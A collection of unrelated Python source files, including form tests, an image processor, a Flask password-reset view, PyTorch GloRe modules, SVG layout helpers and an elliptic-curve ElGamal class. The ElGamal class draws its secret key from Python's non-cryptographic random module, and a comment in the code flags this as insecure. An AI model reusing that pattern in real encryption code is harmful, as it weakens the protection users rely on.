| id | content |
|---|---|
1695944
|
from freezegun import freeze_time
from openinghours.tests.tests import OpeningHoursTestCase
class FormsTestCase(OpeningHoursTestCase):
def setUp(self):
super(FormsTestCase, self).setUp()
def tearDown(self):
super(FormsTestCase, self).tearDown()
def test_hours_are_published(self):
response = self.client.get('/')
self.assertContains(response, '8:30am to 12:00pm')
self.assertContains(response, '10:00am to 1:00pm')
def test_edit_form(self):
self.tearDown()
post_data = {
'day1_1-opens': '11:30', 'day1_1-shuts': '17:30',
'day2_1-opens': '11:30', 'day2_1-shuts': '17:30',
'day3_1-opens': '11:30', 'day3_1-shuts': '17:30',
'day4_1-opens': '11:30', 'day4_1-shuts': '17:30',
'day5_1-opens': '11:30', 'day5_1-shuts': '17:30',
'day6_1-opens': '11:30', 'day6_1-shuts': '13:30',
'day7_1-opens': '00:00', 'day7_1-shuts': '00:00',
'day1_2-opens': '00:00', 'day1_2-shuts': '00:00',
'day2_2-opens': '00:00', 'day2_2-shuts': '00:00',
'day3_2-opens': '00:00', 'day3_2-shuts': '00:00',
'day4_2-opens': '00:00', 'day4_2-shuts': '00:00',
'day5_2-opens': '00:00', 'day5_2-shuts': '00:00',
'day6_2-opens': '00:00', 'day6_2-shuts': '00:00',
'day7_2-opens': '00:00', 'day7_2-shuts': '00:00',
}
post = self.client.post('/edit/1', post_data)
resp = self.client.get('/edit/1')
self.assertContains(resp, '<option value="11:30" selected', count=6)
self.assertContains(resp, '<option value="17:30" selected', count=5)
self.assertContains(resp, '<option value="00:00">', count=7*2*2)
resp2 = self.client.get('/')
self.assertContains(resp2, '11:30am')
self.assertContains(resp2, '5:30pm')
|
1695967
|
import logging
import requests
from io import BytesIO
from PIL import Image, ImageDraw, ImageFont, ImageOps
import app.data.firestore as data
logger = logging.getLogger('food-flex')
INTERNAL_RES = (1024, 1024)
OUTPUT_RES = (1024, 1024)
FONT_PATH = 'static/DejaVuSans-Bold.ttf'
FONT_BASE_SIZE = int(0.2 * INTERNAL_RES[1])
FONT_SHADOW_SIZE = int(1.125 * FONT_BASE_SIZE)
font_base = ImageFont.truetype(FONT_PATH, FONT_BASE_SIZE)
font_shadow = ImageFont.truetype(FONT_PATH, FONT_SHADOW_SIZE)
def process_image(url, letter):
logger.debug(f'Download & process {url}')
image_loaded = False
try:
response = requests.get(url, timeout=5)
try:
response.raise_for_status()
try:
image = Image.open(BytesIO(response.content))
image = rotate_if_exif_specifies(image)
image_loaded = True
except OSError:
logger.error('Image decoding error')
except requests.HTTPError:
logger.error('HTTP error')
except requests.exceptions.ConnectionError:
logger.error('Network error')
# Replace image with a grey background if it does not load
if not image_loaded:
image = Image.new('RGB', (1, 1), color='grey')
# Scale image to fixed size
    image = ImageOps.fit(image, INTERNAL_RES, method=Image.LANCZOS)  # LANCZOS is the old ANTIALIAS (removed in Pillow 10)
draw = ImageDraw.Draw(image)
# Draw 'error' if image could not be loaded
if not image_loaded:
pos = (INTERNAL_RES[0] * 0.19, INTERNAL_RES[1] * 0.35)
draw.text(pos, 'error', font=font_shadow, fill='black')
# Add letter to corner of image
x, y = (INTERNAL_RES[0] * 0.05, INTERNAL_RES[1] * 0.01)
draw.text((x, y), letter, font=font_shadow, fill='black')
draw.text((x-1, y-1), letter, font=font_base, fill='white')
# Resize image if needed
if INTERNAL_RES != OUTPUT_RES:
image = image.resize(OUTPUT_RES, Image.NEAREST)
buffer = BytesIO()
image.save(buffer, format='png', compress_level=6)
logger.debug(f'Done, {buffer.tell() // 1024} KB image created ')
buffer.seek(0)
return buffer
def rotate_if_exif_specifies(image):
try:
exif_tags = image._getexif()
if exif_tags is None:
# No EXIF tags, so we don't need to rotate
logger.debug('No EXIF data, so not transforming')
return image
value = exif_tags[274]
    except (AttributeError, KeyError):
        # No EXIF support on this image type, or no rotation tag present,
        # so we don't need to rotate
        logger.debug('No usable EXIF rotation tag, so not transforming')
return image
value_to_transform = {
1: (0, False),
2: (0, True),
3: (180, False),
4: (180, True),
5: (-90, True),
6: (-90, False),
7: (90, True),
8: (90, False)
}
try:
angle, flip = value_to_transform[value]
except KeyError:
        logger.warning(f'EXIF rotation \'{value}\' unknown, not transforming')
return image
logger.debug(f'EXIF rotation \'{value}\' detected, rotating {angle} degrees, flip: {flip}')
if angle != 0:
image = image.rotate(angle)
if flip:
        image = image.transpose(Image.FLIP_LEFT_RIGHT)
return image
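# Usage sketch (hypothetical URL): download an image, stamp a letter in the
# corner, and write the resulting PNG buffer to disk.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    buf = process_image('https://example.com/photo.jpg', 'A')
    with open('processed.png', 'wb') as f:
        f.write(buf.read())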
|
1695975
|
from flask import jsonify, request
from flask_security.recoverable import send_reset_password_instructions
from flask_security.views import _security
from http import HTTPStatus
from werkzeug.datastructures import MultiDict
from .blueprint import frontend, security
from ..decorators import anonymous_user_required
@frontend.route('/login/forgot-password')
@security.route('/reset', methods=['POST'])
@anonymous_user_required
def forgot_password():
"""View function that handles a forgotten password request."""
form = _security.forgot_password_form(MultiDict(request.get_json()))
if form.validate_on_submit():
send_reset_password_instructions(form.user)
else:
return jsonify({'errors': form.errors}), HTTPStatus.BAD_REQUEST
return '', HTTPStatus.NO_CONTENT
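# Exercising the endpoint with Flask's test client (a sketch; assumes `app` is
# the application that registered these blueprints, and that the default
# Flask-Security form validates an 'email' field):
#
#     with app.test_client() as c:
#         resp = c.post('/reset', json={'email': 'user@example.com'})
#         assert resp.status_code in (204, 400)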
|
1696005
|
import random
from os import urandom
from typing import Callable, Tuple
from dataclasses import dataclass
from ecc.curve import Curve, Point
@dataclass
class ElGamal:
curve: Curve
def encrypt(self, plaintext: bytes, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
return self.encrypt_bytes(plaintext, public_key, randfunc)
def decrypt(self, private_key: int, C1: Point, C2: Point) -> bytes:
return self.decrypt_bytes(private_key, C1, C2)
def encrypt_bytes(self, plaintext: bytes, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
# Encode plaintext into a curve point
M = self.curve.encode_point(plaintext)
return self.encrypt_point(M, public_key, randfunc)
def decrypt_bytes(self, private_key: int, C1: Point, C2: Point) -> bytes:
M = self.decrypt_point(private_key, C1, C2)
return self.curve.decode_point(M)
def encrypt_point(self, plaintext: Point, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
randfunc = randfunc or urandom
# Base point G
G = self.curve.G
M = plaintext
        random.seed(randfunc(1024))
        # Note: Python's `random` module is not cryptographically secure even
        # when seeded from urandom; production code should draw k from a CSPRNG.
        # k must lie in [1, n-1]: k == n would make C1 the point at infinity.
        k = random.randint(1, self.curve.n - 1)
C1 = k * G
C2 = M + k * public_key
return C1, C2
def decrypt_point(self, private_key: int, C1: Point, C2: Point) -> Point:
M = C2 + (self.curve.n - private_key) * C1
return M
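# Round-trip sketch (assumes the companion `ecc.curve` module exposes a named
# curve such as P256 with attributes G and n, plus point arithmetic; the
# message must be short enough to encode into a single curve point):
#
#     from ecc.curve import P256
#     private_key = random.randint(1, P256.n - 1)
#     public_key = private_key * P256.G
#     cipher = ElGamal(P256)
#     C1, C2 = cipher.encrypt(b'hello', public_key)
#     assert cipher.decrypt(private_key, C1, C2) == b'hello'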
|
1696047
|
import os
import sys
import re
import types
import itertools
import matplotlib.pyplot as plt
import numpy
import scipy.stats
import numpy.ma
import Stats
import Histogram
from CGATReport.Tracker import *
from cpgReport import *
##########################################################################
class replicatedIntervalsPerContig(cpgTracker):
"""Summary stats of intervals called by the peak finder. """
mPattern = "_replicated_intervals$"
def __call__(self, track, slice=None):
data = self.getAll( """SELECT i.Contig, g.length as Contig_length, m.mappable_bases, B.repeat_length, COUNT(i.interval_id) as Intervals, A.Predicted_CGIs,
round(COUNT(i.interval_id)/(m.mappable_bases/1000000.0),2) as CAPseq_density,
round(AVG(i.length),0) as Mean_length, round(AVG(i.nprobes),0) as Mean_reads
FROM %(track)s_replicated_intervals i, annotations.genome g, annotations.mappable_bases_per_contig m,
(select contig, COUNT(id) as Predicted_CGIs from cgi_intervals group by contig) as A,
(select contig, sum(stop-start) as repeat_length from annotations.repeats group by contig) B
WHERE i.contig=g.id AND A.contig=i.contig
AND B.contig=i.contig AND m.contig=i.contig
GROUP BY i.contig ORDER BY g.length desc LIMIT 100;""" )
headers = ("Contig length", "CAPseq Intervals", "Predicted CGIs",
"CAPseq Density", "Mean Interval Length", "Mean Interval Reads")
n = odict()
for d in data:
            contig = d[0]  # first column of the row is the contig name
n[str(contig)] = odict(list(zip(headers, d[2:])))
#result = zip(headers, zip(*data))
return data
|
1696085
|
from sources.base.interface import DownloadableSource
from utils import file
from downloaders import BaseDownloader
from sources.base import BaseSource
class TextSource(BaseSource, DownloadableSource):
    __source_name__ = "text"

    def __init__(self, url, headers, filename, filecontent):
        self.url = url
        self.headers = headers
        self.filename = filename
        self.filecontent = filecontent

    @property
    def suffix(self):
        return self.filename.split(".")[-1]

    def download(self, downloader: BaseDownloader, saveroute, **kwargs):
        if self.url == "":
            file.writeToFile(self.filecontent, saveroute, self.filename)
        else:
            downloader.download(self.url, saveroute, self.filename, headers=self.headers, **kwargs)
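# Usage sketch (hypothetical values): an inline-content source writes straight
# to disk, while a URL-backed source delegates to the supplied downloader.
#
#     src = TextSource(url="", headers={}, filename="notes.txt",
#                      filecontent="hello")
#     src.download(downloader=None, saveroute="/tmp")  # writes /tmp/notes.txt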
|
1696091
|
import torch
from torch import nn
import numpy as np
import cv2
### FB Global Reasoning Block ###
# From: https://github.com/facebookresearch/GloRe
class GCN(nn.Module):
""" Graph convolution unit (single layer)
"""
def __init__(self, num_state, num_node, bias=False):
super(GCN, self).__init__()
self.conv1 = nn.Conv1d(num_node, num_node, kernel_size=1)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv1d(num_state, num_state, kernel_size=1, bias=bias)
def forward(self, x):
# (n, num_state, num_node) -> (n, num_node, num_state)
# -> (n, num_state, num_node)
h = self.conv1(x.permute(0, 2, 1).contiguous()).permute(0, 2, 1)
h = h + x
# (n, num_state, num_node) -> (n, num_state, num_node)
h = self.conv2(self.relu(h))
return h
############### GloRe ################################
class GloRe_Unit(nn.Module):
"""
Graph-based Global Reasoning Unit
Parameter:
'normalize' is not necessary if the input size is fixed
"""
def __init__(self, num_in, num_mid,
ConvNd=nn.Conv3d,
BatchNormNd=nn.BatchNorm3d,
normalize=False):
super(GloRe_Unit, self).__init__()
self.normalize = normalize
self.num_s = int(2 * num_mid)
self.num_n = int(1 * num_mid)
# reduce dim
self.conv_state1 = ConvNd(num_in, self.num_s, kernel_size=1)
self.conv_state3 = ConvNd(num_in, self.num_s, kernel_size=3, padding=1)
self.conv_state5 = ConvNd(num_in, self.num_s, kernel_size=5, padding=2)
        self.maxpool_state = nn.MaxPool2d(kernel_size=3, padding=1, stride=1)  # note: pooling is hard-coded to 2D, so this unit assumes 2D inputs even though ConvNd defaults to Conv3d
self.conv_statem = ConvNd(num_in, self.num_s, kernel_size=1)
# projection map
self.conv_proj1 = ConvNd(int(num_in/2), self.num_n, kernel_size=1)
self.conv_proj3 = ConvNd(int(num_in/2), self.num_n, kernel_size=3, padding=1)
self.conv_proj5 = ConvNd(int(num_in/2), self.num_n, kernel_size=5, padding=2)
self.maxpool_proj = nn.MaxPool2d(kernel_size=3, padding=1, stride=1)
self.conv_projm = ConvNd(int(num_in/2), self.num_n, kernel_size=1)
# ----------
# reasoning via graph convolution
self.gcn1 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcn3 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcn5 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcnm = GCN(num_state=self.num_s, num_node=self.num_n)
# ----------
# extend dimension
self.conv_extend1 = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
self.conv_extend3 = ConvNd(self.num_s, num_in, kernel_size=3, padding=1, bias=False)
self.conv_extend5 = ConvNd(self.num_s, num_in, kernel_size=5, padding=2, bias=False)
self.conv_extendm = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
#Concatenation and reduction
self.original_size = ConvNd(5*num_in, num_in, kernel_size=1, bias=False)
self.blocker = BatchNormNd(num_in, eps=1e-04) # should be zero initialized
def forward(self, x, x_proj):
'''
:param x: (n, c, d, h, w)
'''
n = x.size(0)
#print(x.shape)
# (n, num_in, h, w) --> (n, num_state, h, w)
# --> (n, num_state, h*w)
x_state_reshaped1 = self.conv_state1(x).view(n, self.num_s, -1)
x_state_reshaped3 = self.conv_state3(x).view(n, self.num_s, -1)
x_state_reshaped5 = self.conv_state5(x).view(n, self.num_s, -1)
x_state_reshapedm = self.conv_statem(self.maxpool_state(x)).view(n, self.num_s, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_proj_reshaped1 = self.conv_proj1(x_proj).view(n, self.num_n, -1)
x_proj_reshaped3 = self.conv_proj3(x_proj).view(n, self.num_n, -1)
x_proj_reshaped5 = self.conv_proj5(x_proj).view(n, self.num_n, -1)
x_proj_reshapedm = self.conv_projm(self.maxpool_proj(x_proj)).view(n, self.num_n, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_rproj_reshaped1 = x_proj_reshaped1
x_rproj_reshaped3 = x_proj_reshaped3
x_rproj_reshaped5 = x_proj_reshaped5
x_rproj_reshapedm = x_proj_reshapedm
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# projection: coordinate space -> interaction space
# (n, num_state, h*w) x (n, num_node, h*w)T --> (n, num_state, num_node)
x_n_state1 = torch.matmul(x_state_reshaped1, x_proj_reshaped1.permute(0, 2, 1))
if self.normalize:
x_n_state1 = x_n_state1 * (1. / x_state_reshaped1.size(2))
x_n_state3 = torch.matmul(x_state_reshaped3, x_proj_reshaped3.permute(0, 2, 1))
if self.normalize:
x_n_state3 = x_n_state3 * (1. / x_state_reshaped3.size(2))
x_n_state5 = torch.matmul(x_state_reshaped5, x_proj_reshaped5.permute(0, 2, 1))
if self.normalize:
x_n_state5 = x_n_state5 * (1. / x_state_reshaped5.size(2))
x_n_statem = torch.matmul(x_state_reshapedm, x_proj_reshapedm.permute(0, 2, 1))
if self.normalize:
x_n_statem = x_n_statem * (1. / x_state_reshapedm.size(2))
# reasoning: (n, num_state, num_node) -> (n, num_state, num_node)
x_n_rel1 = self.gcn1(x_n_state1)
x_n_rel3 = self.gcn3(x_n_state3)
x_n_rel5 = self.gcn5(x_n_state5)
x_n_relm = self.gcnm(x_n_statem)
# reverse projection: interaction space -> coordinate space
# (n, num_state, num_node) x (n, num_node, h*w) --> (n, num_state, h*w)
x_state_reshaped1 = torch.matmul(x_n_rel1, x_rproj_reshaped1)
x_state_reshaped3 = torch.matmul(x_n_rel3, x_rproj_reshaped3)
x_state_reshaped5 = torch.matmul(x_n_rel5, x_rproj_reshaped5)
x_state_reshapedm = torch.matmul(x_n_relm, x_rproj_reshapedm)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# (n, num_state, h*w) --> (n, num_state, h, w)
x_state1 = x_state_reshaped1.view(n, self.num_s, *x.size()[2:])
x_state3 = x_state_reshaped3.view(n, self.num_s, *x.size()[2:])
x_state5 = x_state_reshaped5.view(n, self.num_s, *x.size()[2:])
x_statem = x_state_reshapedm.view(n, self.num_s, *x.size()[2:])
# -----------------
# (n, num_state, h, w) -> (n, num_in, h, w)
x_reasoned1 = self.blocker(self.conv_extend1(x_state1))
x_reasoned3 = self.blocker(self.conv_extend3(x_state3))
x_reasoned5 = self.blocker(self.conv_extend5(x_state5))
x_reasonedm = self.blocker(self.conv_extendm(x_statem))
out = x + x_reasoned1 + x_reasoned3 + x_reasoned5 + x_reasonedm
#out = torch.cat((x, x_reasoned1, x_reasoned3, x_reasoned5, x_reasonedm),1)
#out = self.original_size(out)
# for i in range(3):
# img = np.asarray(x_proj_reshaped1[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_1_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshaped3[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_3_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshaped5[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_5_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshapedm[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_max_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/x_proj_in_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/x_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(out[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/out_{}.jpg".format(i),np.asarray(img))
return out
class Inception_GloRe_Unit_2D(GloRe_Unit):
def __init__(self, num_in, num_mid, normalize=False):
"""
Set 'normalize = True' if the input size is not fixed
"""
super(Inception_GloRe_Unit_2D, self).__init__(num_in, num_mid,
ConvNd=nn.Conv2d,
BatchNormNd=nn.BatchNorm2d,
normalize=normalize)
############### GloRe ################################
class GloRe_Unit_v2(nn.Module):
"""
Graph-based Global Reasoning Unit
Parameter:
'normalize' is not necessary if the input size is fixed
"""
def __init__(self, num_in, num_mid,
ConvNd=nn.Conv3d,
BatchNormNd=nn.BatchNorm3d,
normalize=False):
super(GloRe_Unit_v2, self).__init__()
self.normalize = normalize
self.num_s = int(2 * num_mid)
self.num_n = int(1 * num_mid)
# reduce dim
self.conv1_state = ConvNd(num_in, self.num_s, kernel_size=1) #1x1 Convolutional layer (reduce dim)
self.conv3_state = ConvNd(num_in, self.num_s, kernel_size=3, padding=1) #3x3 Convolutional layer (reduce dim)
self.conv5_state = ConvNd(num_in, self.num_s, kernel_size=5, padding=2) #5x5 Convolutional layer (reduce dim)
self.maxpool_state = nn.MaxPool2d(kernel_size=3, padding=1, stride=1) #Max pooling layer (reduce dim)
self.maxconv1_state = ConvNd(num_in, self.num_s, kernel_size=1) #max pooling 1x1 conv layer (reduce dim)
self.concat1_state = ConvNd(4, 1, kernel_size=1) #concat 1x1 conv layer (reduce dim)
# projection map
self.conv1_proj = ConvNd(num_in, self.num_n, kernel_size=1) #1x1 Convolutional layer (proj)
self.conv3_proj = ConvNd(num_in, self.num_n, kernel_size=3, padding=1) #3x3 Convolutional layer (proj)
self.conv5_proj = ConvNd(num_in, self.num_n, kernel_size=5, padding=2) #5x5 Convolutional layer (proj)
self.maxpool_proj = nn.MaxPool2d(kernel_size=3, padding=1, stride=1) #Max pooling layer (proj)
self.maxconv1_proj = ConvNd(num_in, self.num_n, kernel_size=1) #max pooling 1x1 conv layer (proj)
self.concat1_proj = ConvNd(4, 1, kernel_size=1) #concat 1x1 conv layer (proj)
# ----------
# reasoning via graph convolution
self.gcn = GCN(num_state=self.num_s, num_node=self.num_n)
# ----------
# extend dimension
self.conv_extend = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
self.blocker = BatchNormNd(num_in, eps=1e-04) # should be zero initialized
def forward(self, x, print_features=False):
'''
:param x: (n, c, d, h, w)
'''
n = x.size(0)
#print(x.shape)
# (n, num_in, h, w) --> (n, num_state, h, w)
# --> (n, num_state, h*w)
x_state_reshaped1 = self.conv1_state(x).view(n, 1, self.num_s, -1)
x_state_reshaped3 = self.conv3_state(x).view(n, 1, self.num_s, -1)
x_state_reshaped5 = self.conv5_state(x).view(n, 1, self.num_s, -1)
x_state_reshapedm = self.maxconv1_state(self.maxpool_state(x)).view(n, 1, self.num_s, -1)
x_state_concat = torch.cat((x_state_reshaped1, x_state_reshaped3, x_state_reshaped5, x_state_reshapedm), 1)
x_state_reshaped = self.concat1_state(x_state_concat).view(n, self.num_s, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_proj_reshaped1 = self.conv1_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshaped3 = self.conv3_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshaped5 = self.conv5_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshapedm = self.maxconv1_proj(self.maxpool_proj(x)).view(n, 1, self.num_n, -1)
x_proj_concat = torch.cat((x_proj_reshaped1, x_proj_reshaped3, x_proj_reshaped5, x_proj_reshapedm), 1)
x_proj_reshaped = self.concat1_proj(x_proj_concat).view(n, self.num_n, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_rproj_reshaped = x_proj_reshaped
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# projection: coordinate space -> interaction space
# (n, num_state, h*w) x (n, num_node, h*w)T --> (n, num_state, num_node)
x_n_state = torch.matmul(x_state_reshaped, x_proj_reshaped.permute(0, 2, 1))
if self.normalize:
x_n_state = x_n_state * (1. / x_state_reshaped.size(2))
# reasoning: (n, num_state, num_node) -> (n, num_state, num_node)
x_n_rel = self.gcn(x_n_state)
# reverse projection: interaction space -> coordinate space
# (n, num_state, num_node) x (n, num_node, h*w) --> (n, num_state, h*w)
x_state_reshaped = torch.matmul(x_n_rel, x_rproj_reshaped)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# (n, num_state, h*w) --> (n, num_state, h, w)
x_state = x_state_reshaped.view(n, self.num_s, *x.size()[2:])
# -----------------
# (n, num_state, h, w) -> (n, num_in, h, w)
x_reasoned = self.blocker(self.conv_extend(x_state))
out = x + x_reasoned
if print_features:
for i in range(4):
img = np.asarray(x_state_reshaped[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_state_{}.jpg".format(i),np.asarray(img))
img = np.asarray(x_state_reshaped[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_proj_{}.jpg".format(i),np.asarray(img))
img = np.asarray(x[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_{}.jpg".format(i),np.asarray(img))
img = np.asarray(out[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/out_{}.jpg".format(i),np.asarray(img))
return out
class Inception_GloRe_Unit_2D_v2(GloRe_Unit_v2):
def __init__(self, num_in, num_mid, normalize=False):
"""
Set 'normalize = True' if the input size is not fixed
"""
super(Inception_GloRe_Unit_2D_v2, self).__init__(num_in, num_mid,
ConvNd=nn.Conv2d,
BatchNormNd=nn.BatchNorm2d,
normalize=normalize)
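# Smoke-test sketch for the 2D inception variant: `x_proj` carries half the
# channels of `x`, matching the conv_proj* layers above, and the residual
# design preserves the input shape.
if __name__ == '__main__':
    unit = Inception_GloRe_Unit_2D(num_in=64, num_mid=16)
    x = torch.randn(2, 64, 32, 32)
    x_proj = torch.randn(2, 32, 32, 32)
    out = unit(x, x_proj)
    assert out.shape == x.shape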
|
1696101
|
from xml.dom import minidom
from .svg_to_axes import FigureLayout, repar, tounit, XMLNS, get_elements_by_attr
import copy
import matplotlib.pyplot as plt
import numpy as np
import pkg_resources
def get_empty_svg_document(tmp_filename=".fifi_tmp.svg"):
"""
Creates basic svg template file and saves it to disk. Returns the filename.
"""
doc = minidom.Document()
svg = doc.createElement("svg")
attributes = {
"xmlns:figurefirst": "http://flyranch.github.io/figurefirst/",
"xmlns:dc": "http://purl.org/dc/elements/1.1/",
"xmlns:cc": "http://creativecommons.org/ns#",
"xmlns:rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"xmlns:svg": "http://www.w3.org/2000/svg",
"xmlns": "http://www.w3.org/2000/svg",
"xmlns:inkscape": "http://www.inkscape.org/namespaces/inkscape",
"width": "6in",
"height": "3in",
"viewBox": "0 0 432 216",
"id": "svg2",
"version": "1.1",
"inkscape:version": "0.91 r13725",
}
for attribute, value in attributes.items():
svg.setAttribute(attribute, value)
doc.appendChild(svg)
    with open(tmp_filename, "w") as outfile:
        doc.writexml(outfile, encoding="utf-8")
    return tmp_filename
def set_figure_size(fig, layout):
svg = layout.output_xml.getElementsByTagName("svg")[0]
width, height = fig.get_size_inches()
svg.setAttribute("width", repar(width, "in"))
svg.setAttribute("height", repar(height, "in"))
viewBox = "0 0 " + str(width * 72) + " " + str(height * 72)
svg.setAttribute("viewBox", viewBox)
return layout
def load_template_svg():
tmp_filename = get_empty_svg_document()
return FigureLayout(tmp_filename)
def create_rect_for_ax(layout, parent, ax, name):
new_rect = layout.output_xml.createElement("rect")
figurefirst_axis_tag = layout.output_xml.createElementNS(XMLNS, "figurefirst:axis")
figurefirst_axis_tag.setAttribute("figurefirst:name", name)
bbox = ax.get_position()
width, height = ax.figure.get_size_inches()
# set default attributes
    attributes = {
        "x": str(width * tounit([bbox.x0, "in"], "px")),
        "y": str(height * tounit([1 - bbox.y0 - bbox.height, "in"], "px")),
        "width": str(width * tounit([bbox.width, "in"], "px")),
        "height": str(height * tounit([bbox.height, "in"], "px")),
    }
for attribute, value in attributes.items():
new_rect.setAttribute(attribute, value)
new_rect.appendChild(figurefirst_axis_tag)
parent.appendChild(new_rect)
def mpl_fig_to_figurefirst_svg(
mpl_fig,
output_filename,
design_layer_name="mpl_design_layer",
figurefirst_figure_name="mpl_output_layer",
):
"""
Given a matplotlib figure (mpl_fig) with multiple axes, this function creates an
svg file (output_filename) that conforms to the figurefirst specs with rectangles
drawn and tagged for each matplotlib axis. The axes are grouped together under a
figurefirst:figure tag (name:mpl_output_layer), and the layout is saved to svg.
"""
layout = load_template_svg()
layout = set_figure_size(mpl_fig, layout)
layout.create_new_targetlayer(design_layer_name)
output_svg = layout.output_xml.getElementsByTagName("svg")[0]
layer = get_elements_by_attr(output_svg, "inkscape:label", design_layer_name)[0]
group = layout.output_xml.createElement("g")
layer.appendChild(group)
figurefirst_figure_tag = layout.output_xml.createElementNS(
XMLNS, "figurefirst:figure"
)
figurefirst_figure_tag.setAttribute("figurefirst:name", figurefirst_figure_name)
group.appendChild(figurefirst_figure_tag)
for i, ax in enumerate(mpl_fig.axes):
create_rect_for_ax(layout, group, ax, "ax" + str(i))
layout.write_svg(output_filename)
layout = FigureLayout(output_filename, make_mplfigures=True)
return layout
def add_mpl_fig_to_figurefirst_svg(
fifi_svg_filename,
mpl_fig,
output_filename,
design_layer_name="mpl_design_layer",
figurefirst_figure_name="mpl_template",
):
layout = FigureLayout(fifi_svg_filename)
layout.create_new_targetlayer(design_layer_name)
output_svg = layout.output_xml.getElementsByTagName("svg")[0]
layer = get_elements_by_attr(output_svg, "inkscape:label", design_layer_name)[0]
group = layout.output_xml.createElement("g")
layer.appendChild(group)
figurefirst_figure_tag = layout.output_xml.createElementNS(
XMLNS, "figurefirst:figure"
)
figurefirst_figure_tag.setAttribute("figurefirst:name", figurefirst_figure_name)
group.appendChild(figurefirst_figure_tag)
for i, ax in enumerate(mpl_fig.axes):
create_rect_for_ax(layout, group, ax, "ax" + str(i))
layout.write_svg(output_filename)
layout = FigureLayout(output_filename, make_mplfigures=True)
return layout
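# Usage sketch (placeholder output path): convert a two-axis matplotlib figure
# into a tagged figurefirst SVG.
if __name__ == "__main__":
    fig, (ax0, ax1) = plt.subplots(1, 2)
    mpl_fig_to_figurefirst_svg(fig, "layout.svg")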
|
1696133
|
FILE = 'tests/__init__.py'
MESSAGE = 'This is a test.'
RESPONSE_DATA = {'status': 1, 'message': 'fail'}
SERVERS_AND_FILES = (
('https://vim.cx', FILE), # PrivateBin 1.3
('https://privatebin.gittermann1.de/', FILE), # PrivateBin 1.2
('https://paste.carrade.eu/', FILE), # PrivateBin 1.1
# ('https://paste.nikul.in/', None), # PrivateBin 1.0 (Host offline)
)
__all__ = ('MESSAGE', 'RESPONSE_DATA', 'SERVERS_AND_FILES')
|
1696139
|
from adafruit_circuitplayground.express import cpx
import time
while True:
print(cpx.button_a)
time.sleep(0.05)
|
1696176
|
import pytest
import os, re, io
import helper
import peeringdb
from peeringdb import cli as _cli
CMD = "peeringdb_test"
client = helper.client_fixture("full")
# Run with config dir
class RunCli:
def __init__(self, c):
self.config_dir = str(c)
def __call__(self, *args):
fullargs = [CMD]
fullargs.extend(["-C", self.config_dir])
fullargs.extend(args)
return _cli.main(fullargs)
@pytest.fixture
def runcli(config0_dir):
return RunCli(config0_dir)
def test_basic():
assert _cli.main([CMD]) != 0
assert _cli.main([CMD, "-h"]) == 0
def test_version():
assert _cli.main([CMD, "--version"]) == 0
def test_config(runcli):
